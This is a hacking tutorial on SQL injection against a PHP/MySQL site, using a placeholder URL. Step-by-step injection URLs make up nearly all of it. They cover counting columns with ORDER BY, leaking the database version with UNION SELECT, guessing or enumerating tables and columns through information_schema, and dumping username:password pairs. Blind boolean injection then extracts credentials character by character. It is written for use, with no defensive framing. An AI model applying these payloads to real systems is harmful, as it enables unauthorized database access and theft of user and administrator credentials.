[Noevil:PHP INJECTION]
#
www.xxx.com/news.php?id=5 order by 1/*
www.xxx.com/news.php?id=5 order by 2/*
www.xxx.com/news.php?id=5 order by 3/*
www.xxx.com/news.php?id=5 order by 4/* gives an error
so the query has 3 columns ~
#
www.xxx.com/news.php?id=5 union all select 1,2,3/*
see which number shows up on the screen~
#
we can comment out the rest of the query with /* or with -- (followed by a space)
if the number 2 shows up on the screen
we can do this :
www.xxx.com/news.php?id=5 union all select 1,@@version,3/*
or
www.xxx.com/news.php?id=5 union all select 1,version(),3/*
if you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
(but I have never seen it myself)
what we need is convert()
so:
www.xxx.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
or with hex() and unhex()
so:
www.xxx.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
you will get the MySQL version~
#
if the version is <5 (4.1.33, 4.1.12...) there is no information_schema,
so in most cases we must guess table and column names.
table names like:
user/s, admin/s, member/s…
column names like:
username,user,user_name,password,pass,passwd,pwd...
so:
www.xxx.com/news.php?id=5 union all select 1,2,3 from admin/*
(we see number 2 on the screen like before, and that's good!)
so we know that table admin exists...
now to check column names.
so :
www.xxx.com/news.php?id=5 union all select 1,username,3 from admin/*
(if there is an error, try another column name)
we get the username displayed on screen, for example admin, superadmin etc...
now to check if column password exists
so:
www.xxx.com/news.php?id=5 union all select 1,password,3 from admin/*
same as before~
to display both at once we can use concat()
so:
www.xxx.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
(0x3a is the hex value for ':' ,
or use char(58), the ASCII value for :)
so:
www.xxx.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
now we get display username:password on screen.
#
mysql 5
like before, but if mysql is 5 or newer
we have information_schema. it holds all tables and columns in the database.
to get tables we select table_name from information_schema.tables.
so:
www.xxx.com/news.php?id=5 union select 1,table_name,3 from information_schema.tables/*
that only shows whichever table lands on the screen, so we add limit to the end of the query to walk through all tables one at a time.
so:
www.xxx.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
display the second table :
www.xxx.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
then the third:
www.xxx.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
…
keep incrementing until you get something useful like db_admin,auth,auth_user etc...
to get the column names the method is the same.
here we use column_name and information_schema.columns
so:
www.xxx.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
www.xxx.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
www.xxx.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 2,1/*
…
so keep incrementing until you get something like :
username,user,login,password,pass,passwd etc…
if you wanna display column name for specific table use this query.(where clause)
let’s say that we found table users.
so:
www.xxx.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
now we get the column names of table users displayed; using limit we can list all columns in table users.
* note that this won't work if magic quotes is on, because the quotes around 'users' get escaped.
let's get the columns user, pass and email.
put them all together
use concat()
so:
www.xxx.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email),3 from users/*
#
blind sql injection.
www.xxx.com/news.php?id=5 and substring(@@version,1,1)=4
www.xxx.com/news.php?id=5 and substring(@@version,1,1)=5
see which one returns true.
#
when a select in the union doesn't work, we use a subselect.
so :
www.xxx.com/news.php?id=5 and (select 1)=1
if page loads normally then subselects work.
let go on:
www.xxx.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if that returns true we can go on like this:
(guess guess guess!!!)
www.xxx.com/news.php?id=5 and (select 1 from users limit 0,1)=1
if the page returns normally, the users table exists.
otherwise keep guessing.
guess column:
www.xxx.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1
if the page returns normally, the password column exists.
guess the contents: (a classic)
www.xxx.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
this tests the ASCII code of the first character.
keep changing the number at the end until it fails.
www.xxx.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98 (true)
www.xxx.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99 (error)
so the first character in username is char(99).
that is 'c'.
go on with the second character (position 2):
www.xxx.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>98 (true)
...
www.xxx.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>104 (true)
www.xxx.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>105 (error)
so the second character is char(105), that is 'i'
keep incrementing the position until you reach the end (when >0 returns false we know we have reached the end).
have fun!